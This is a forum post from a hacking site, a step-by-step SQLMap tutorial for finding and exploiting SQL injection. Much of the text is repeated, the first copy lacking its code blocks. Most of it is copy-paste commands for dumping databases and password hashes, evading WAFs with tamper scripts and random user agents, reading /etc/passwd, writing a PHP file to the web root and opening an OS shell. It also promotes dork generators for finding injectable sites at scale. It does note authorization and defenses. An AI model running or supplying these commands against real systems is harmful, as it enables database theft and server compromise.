- Joined
- Dec 30, 2024
- Messages
- 388
- Reaction score
- 206
- Points
- 62
- Website
- blackhatpakistan.net
- Points
- 1,068
- USD
- 1,068
SQLMap is the open-source automation tool that detects, exploits, and extracts data through SQL injection vulnerabilities - you point it at a URL parameter and it fingerprints the database backend, enumerates schemas, dumps tables, and optionally drops to an OS shell, all without you writing a single payload by hand. This SQLMap tutorial covers the full 2026 workflow: install on Kali Linux, first detection run, table and database dumping, POST and cookie injection, WAF bypass with tamper scripts, and the exact flags that separate a noisy run from a clean one.
TL;DR - SQLMap turns manual SQL injection into a command-line workflow: detect first (--batch --dbs), enumerate second (-D db --tables), extract last (-T table --dump). Error-based is fastest, time-based is slowest - pick with --technique=BEUSTQ. WAF in the way? --tamper=space2comment,between plus --delay=1 and --random-agent. Always test only systems you own or have written permission to assess. Full command reference, flag tables, and the speed/noise profile are below - the cheatsheet at the end is copy-paste ready.
WHAT SQLMAP ACTUALLY DOES
SQL injection happens when user input is concatenated into a database query instead of being parameterized - the attacker's input becomes part of the query's grammar. SQLMap automates the entire exploitation chain in phases:
- Detects the injection class: boolean-based blind, time-based blind, error-based, UNION query, stacked queries, inline queries
- Fingerprints the DBMS: MySQL, PostgreSQL, Microsoft SQL Server, Oracle, SQLite, IBM DB2, SAP MaxDB
- Enumerates: server version, current user, current database, privileges, databases, tables, columns
- Extracts: row data, password hashes, files (LOAD_FILE / INTO OUTFILE), OS shell where the backend permits
A detection run against an error-based vulnerability finishes in 10-30 requests. A time-based blind enumeration can run thousands of requests over minutes - that difference is the whole speed story in this tutorial.
INSTALL ON KALI LINUX
Kali ships sqlmap in the default repositories:
Any distro with Python 3:
Update before every engagement - payload libraries and WAF bypasses change weekly:
STEP 1 - FIRST DETECTION RUN
The safest starting point: detection only, no extraction, auto-answers on:
- -u sets the target URL - the injectable parameter must be inside it
- --batch answers every prompt with its default, so the run never stalls
- --dbs asks for database names the moment injection is confirmed
Expected output on a vulnerable target:
If sqlmap returns "not injectable", the parameter is either filtered or the connection is unstable - retry with --level=3 --risk=2 before declaring it clean.
STEP 2 - ENUMERATE TABLES AND COLUMNS
Every finished run is cached in ~/.local/share/sqlmap/sessions/ - resume instead of repeating with --resume. This one flag saves hours on slow time-based targets.
STEP 3 - DUMP DATA
SQLMap detects hash formats in-column and offers to crack them in-band, dictionary first. To test login forms directly:
--forms grabs every form on the page, --crawl=2 follows links two levels deep and tests each parameter it finds - that combination is the bug-bounty starter command.
STEP 4 - POST, COOKIES, AND AUTHENTICATED SESSIONS
Real targets hide injection behind login walls and in POST bodies.
POST parameters:
Session cookies:
Header injection (X-Forwarded-For, User-Agent, Referer):
Authenticated testing: log in through Burp Suite or your browser first, export the cookie, hand it to sqlmap with --cookie - now you are testing behind the login wall, where the interesting bugs live.
STEP 5 - PICK THE TECHNIQUE
By default sqlmap tries everything - wasteful on slow targets. Narrow it:
Error-based first whenever it works - seconds instead of hundreds of blind probes. Time-based only as the fallback; set --timeout=30 --retries=3 so flaky connections do not kill the run.
STEP 6 - WAF BYPASS WITH TAMPER SCRIPTS
A WAF stripping your payloads? Chain tamper scripts that rewrite syntax:
The useful ones:
- space2comment - spaces become /**/
- between - comparison operators become BETWEEN
- randomcase - randomizes keyword casing (defeats case-sensitive filters)
- charencode - URL-encodes the payload
- base64encode - for double-encoded sinks
Full WAF profile:
--level (1-5) expands which injection points are tested (headers, User-Agent, Referer at higher levels). --risk (1-3) adds riskier payload families - risk 3 can modify data on stacked-query targets, so use it on test environments first.
STEP 7 - POWER FLAGS AFTER YOU ARE IN
--os-shell needs a PHP or ASPX page writing to a web-reachable directory - without it you fall back to file read/write primitives only.
STEP 8 - BATCH AGAINST A LIST
urls.txt is one URL per line. Keep threads at 5 - above that, targets time out mid-run and the results file fills with connection errors instead of findings.
SPEED AND NOISE PROFILE
Noise matters for bug bounty: run --delay=1 with --random-agent on shared hosting, split long lists across sessions, and always log per-client with --output-dir so reports stay organized.
QUICK REFERENCE - COPY PASTE
FAQ
Q: Is sqlmap legal?
A: On systems you own or hold written authorization to test, yes - it is a standard penetration testing tool shipped in every major security distribution. Authorization is the entire line.
Q: Why does sqlmap say "not injectable" when the parameter looks vulnerable?
A: Usually wrong technique selection or a WAF silently stripping payloads. Retry with --level=3 --risk=2 --tamper=space2comment --random-agent before moving on.
Q: sqlmap versus manual testing in Burp?
A: sqlmap finds and exploits what its payload library covers. Logic-level issues - second-order injection, JSON nesting, custom encodings, stateful flows - still require a human driving Burp Repeater.
Q: What is the fastest way to learn sqlmap?
A: Run it against the testphp.vulnweb.com sandbox and the Damn Vulnerable Web App (DVWA) in SQL injection mode - both are legal targets built for exactly this practice.
Q: How do sites defend against sqlmap?
A: Parameterized queries (prepared statements) everywhere, least-privilege database accounts, input normalization before matching in the WAF, and rate limiting that throttles the request bursts sqlmap depends on.
RELATED ON BLACKHAT PAKISTAN
WiFi Password Hack 2026 - Complete Guide - the wireless side of the same testing skillset.
Advanced Web Hacking Tools - the wider toolkit sqlmap sits inside.
SQLi Dumper v10.6 - the GUI route to the same dumps when you want speed over control.
Simple Dork Generator - find injectable parameters at scale with search dorks before you ever run sqlmap.
TL;DR - SQLMap turns manual SQL injection into a command-line workflow: detect first (--batch --dbs), enumerate second (-D db --tables), extract last (-T table --dump). Error-based is fastest, time-based is slowest - pick with --technique=BEUSTQ. WAF in the way? --tamper=space2comment,between plus --delay=1 and --random-agent. Always test only systems you own or have written permission to assess. Full command reference, flag tables, and the speed/noise profile are below - the cheatsheet at the end is copy-paste ready.
WHAT SQLMAP ACTUALLY DOES
SQL injection happens when user input is concatenated into a database query instead of being parameterized - the attacker's input becomes part of the query's grammar. SQLMap automates the entire exploitation chain in phases:
- Detects the injection class: boolean-based blind, time-based blind, error-based, UNION query, stacked queries, inline queries
- Fingerprints the DBMS: MySQL, PostgreSQL, Microsoft SQL Server, Oracle, SQLite, IBM DB2, SAP MaxDB
- Enumerates: server version, current user, current database, privileges, databases, tables, columns
- Extracts: row data, password hashes, files (LOAD_FILE / INTO OUTFILE), OS shell where the backend permits
A detection run against an error-based vulnerability finishes in 10-30 requests. A time-based blind enumeration can run thousands of requests over minutes - that difference is the whole speed story in this tutorial.
INSTALL ON KALI LINUX
Kali ships sqlmap in the default repositories:
Code:
sudo apt update && sudo apt install sqlmap
sqlmap --version
Any distro with Python 3:
Code:
git clone https://github.com/sqlmapproject/sqlmap.git
cd sqlmap
python3 sqlmap.py --version
Update before every engagement - payload libraries and WAF bypasses change weekly:
Code:
git pull
STEP 1 - FIRST DETECTION RUN
The safest starting point: detection only, no extraction, auto-answers on:
Code:
sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" --batch --dbs
- -u sets the target URL - the injectable parameter must be inside it
- --batch answers every prompt with its default, so the run never stalls
- --dbs asks for database names the moment injection is confirmed
Expected output on a vulnerable target:
Code:
available databases [5]:
[*] acuart
[*] information_schema
[*] mysql
[*] performance_schema
[*] test
If sqlmap returns "not injectable", the parameter is either filtered or the connection is unstable - retry with --level=3 --risk=2 before declaring it clean.
STEP 2 - ENUMERATE TABLES AND COLUMNS
Code:
sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" -D acuart --tables
Code:
sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" -D acuart -T users --columns
Every finished run is cached in ~/.local/share/sqlmap/sessions/ - resume instead of repeating with --resume. This one flag saves hours on slow time-based targets.
STEP 3 - DUMP DATA
Code:
sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" -D acuart -T users --dump
SQLMap detects hash formats in-column and offers to crack them in-band, dictionary first. To test login forms directly:
Code:
sqlmap -u "http://testphp.vulnweb.com/login.php" --forms --crawl=2
--forms grabs every form on the page, --crawl=2 follows links two levels deep and tests each parameter it finds - that combination is the bug-bounty starter command.
STEP 4 - POST, COOKIES, AND AUTHENTICATED SESSIONS
Real targets hide injection behind login walls and in POST bodies.
POST parameters:
Code:
sqlmap -u "http://target.com/login.php" --data="user=admin&pass=test" -p user --batch
Session cookies:
Code:
sqlmap -u "http://target.com/page.php" --cookie="PHPSESSID=abc123; security=low" -p id
Header injection (X-Forwarded-For, User-Agent, Referer):
Code:
sqlmap -u "http://target.com/" --headers="X-Forwarded-For: 12.34.56.78" -p id
Authenticated testing: log in through Burp Suite or your browser first, export the cookie, hand it to sqlmap with --cookie - now you are testing behind the login wall, where the interesting bugs live.
STEP 5 - PICK THE TECHNIQUE
By default sqlmap tries everything - wasteful on slow targets. Narrow it:
Code:
sqlmap -u "URL" --technique=BEUSTQ
Code:
Letter Technique Speed
------ --------------------- -------------------
B Boolean-based blind Slow (many requests)
E Error-based Fast (single response)
U UNION query Fast
S Stacked queries Depends on backend
T Time-based blind Slowest (sleep delays)
Q Inline queries Rare
Error-based first whenever it works - seconds instead of hundreds of blind probes. Time-based only as the fallback; set --timeout=30 --retries=3 so flaky connections do not kill the run.
STEP 6 - WAF BYPASS WITH TAMPER SCRIPTS
A WAF stripping your payloads? Chain tamper scripts that rewrite syntax:
Code:
sqlmap -u "URL" --tamper=space2comment,between,randomcase --dbs
The useful ones:
- space2comment - spaces become /**/
- between - comparison operators become BETWEEN
- randomcase - randomizes keyword casing (defeats case-sensitive filters)
- charencode - URL-encodes the payload
- base64encode - for double-encoded sinks
Full WAF profile:
Code:
sqlmap -u "URL" --tamper=space2comment --delay=1 --risk=2 --level=3 --random-agent
--level (1-5) expands which injection points are tested (headers, User-Agent, Referer at higher levels). --risk (1-3) adds riskier payload families - risk 3 can modify data on stacked-query targets, so use it on test environments first.
STEP 7 - POWER FLAGS AFTER YOU ARE IN
Code:
--os-shell interactive OS shell (PHP/ASPX + writable dir)
--file-read="/etc/passwd" read files through the backend
--file-write="a.php" --file-dest="/var/www/html/a.php"
--priv-escal check MSSQL/sysadmin escalation paths
--passwords hash dump across all accounts
--current-user --current-db --is-dba
--os-shell needs a PHP or ASPX page writing to a web-reachable directory - without it you fall back to file read/write primitives only.
STEP 8 - BATCH AGAINST A LIST
Code:
sqlmap -m urls.txt --batch --dbs --threads=5
urls.txt is one URL per line. Keep threads at 5 - above that, targets time out mid-run and the results file fills with connection errors instead of findings.
SPEED AND NOISE PROFILE
Code:
Error-based detection 10-30 requests, under 10 seconds
UNION extraction 30-100 requests, seconds
Boolean blind enumeration 500-2000 requests, minutes
Time-based full dump thousands of requests, hours
Best logging flag --output-dir=/root/engagements/client1
Noise matters for bug bounty: run --delay=1 with --random-agent on shared hosting, split long lists across sessions, and always log per-client with --output-dir so reports stay organized.
QUICK REFERENCE - COPY PASTE
Code:
# detect only, no extraction
sqlmap -u "URL" --batch --smart
# full chain: POST + cookie + dump
sqlmap -u "URL" --data="id=1" --cookie="SESSION=x" \
-D dbname -T table --dump --batch
# crawl a site and test every parameter
sqlmap -u "http://target.com" --crawl=3 --batch --dbs
# WAF bypass profile
sqlmap -u "URL" --tamper=space2comment,between \
--level=3 --risk=2 --random-agent
# bug bounty one-liner
sqlmap -u "URL" --batch --forms --crawl=2 --level=3 \
--risk=2 --technique=BEU --dbs --threads=4
FAQ
Q: Is sqlmap legal?
A: On systems you own or hold written authorization to test, yes - it is a standard penetration testing tool shipped in every major security distribution. Authorization is the entire line.
Q: Why does sqlmap say "not injectable" when the parameter looks vulnerable?
A: Usually wrong technique selection or a WAF silently stripping payloads. Retry with --level=3 --risk=2 --tamper=space2comment --random-agent before moving on.
Q: sqlmap versus manual testing in Burp?
A: sqlmap finds and exploits what its payload library covers. Logic-level issues - second-order injection, JSON nesting, custom encodings, stateful flows - still require a human driving Burp Repeater.
Q: What is the fastest way to learn sqlmap?
A: Run it against the testphp.vulnweb.com sandbox and the Damn Vulnerable Web App (DVWA) in SQL injection mode - both are legal targets built for exactly this practice.
Q: How do sites defend against sqlmap?
A: Parameterized queries (prepared statements) everywhere, least-privilege database accounts, input normalization before matching in the WAF, and rate limiting that throttles the request bursts sqlmap depends on.
RELATED ON BLACKHAT PAKISTAN
WiFi Password Hack 2026 - Complete Guide - the wireless side of the same testing skillset.
Advanced Web Hacking Tools - the wider toolkit sqlmap sits inside.
SQLi Dumper v10.6 - the GUI route to the same dumps when you want speed over control.
Simple Dork Generator - find injectable parameters at scale with search dorks before you ever run sqlmap.
Code:
--batch non-interactive, auto-default answers
--smart only test params that look injectable
--level=3 --risk=2 wider injection surface, richer payloads
--technique=BEU error + boolean + union only (fast)
--threads=5 safe parallelism for URL lists
--random-agent rotate User-Agent per request
--delay=1 throttle for fragile WAFs
--retries=3 survive flaky connections
--timeout=30 per-request timeout
--resume continue a saved session
--output-dir=DIR per-engagement result isolation